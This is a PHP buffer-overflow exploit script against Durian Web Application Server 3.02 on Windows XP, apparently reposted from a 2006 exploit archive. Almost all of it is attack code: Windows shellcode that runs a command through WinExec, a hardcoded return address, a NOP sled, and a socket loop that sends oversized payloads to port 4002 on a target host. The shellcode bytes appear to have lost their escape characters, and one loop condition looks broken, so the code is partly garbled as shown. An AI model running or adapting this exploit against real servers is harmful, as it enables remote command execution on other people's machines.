durian-302-exec.txt

Posted on 29 December 2006
<?php
/*
Durian Web Application Server 3.02 freeware for Win32 buffer
overflow execute command exploit

by rgod
mail: retrog at alice dot it
site: http://retrogod.altervista.org

tested against xp sp2 ita

software site -> http://sourceforge.net/projects/durian/

*/

error_reporting(E_ALL);
$address = "192.168.1.3";
$service_port = "4002";

$shellcode =
"xebx1b".
"x5b".
"x31xc0".
"x50".
"x31xc0".
"x88x43x59".
"x53".
"xbbx6dx13x86x7c". //WinExec, 0x7c86136d
"xffxd3".
"x31xc0".
"x50".
"xbbxdaxcdx81x7c". //ExitProcess, 0x7c81cdda
"xffxd3".
"xe8xe0xffxffxff".
"x63x6dx64".
"x2e".
"x65".
"x78x65".
"x20x2f".
"x63x20".
"cmd.exe /c start notepad & ";

//$eip="x72xe0xf1x00";//DEP disabled
$eip="x72xe0xf2x00";

$ch  =array("xaa","xa0","x41");
$size=array(30,70,150,330,520,700,1400,2300);

for ($j=0; $j<count($ch); $j++){
for ($i=0; $i<count($size); $i++){
$junk="";
if (($j==2) and ($i==7)){
$junk ="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVXXXX";
$junk.="YYYYZZZZaaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuu";
$junk.=$eip; //jmp shellcode
for ($n=1; $n<=100; $n++){
$junk.="x90";
}
$junk.=$shellcode;
for ($n=1; $n=(2300-strlen($junk)); $n++){
$junk.="x90";
}
}
else {
for ($k=1; $k<=$size[$i]; $k++){
$junk.=$ch[$j];
}
}
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
die("socket_create() failed:
 reason: " . socket_strerror($socket) . "
");
}
$result = socket_connect($socket, $address, $service_port);
if ($result < 0) {
die("socket_connect() failed:
 reason: ($result) " . socket_strerror($result) . "
");
}
$in = $junk;
socket_write($socket, $in, strlen ($in));
socket_close($socket);
}
}
?>
TOP
Malware :

None in database
Last 20
Exploits :

Last 20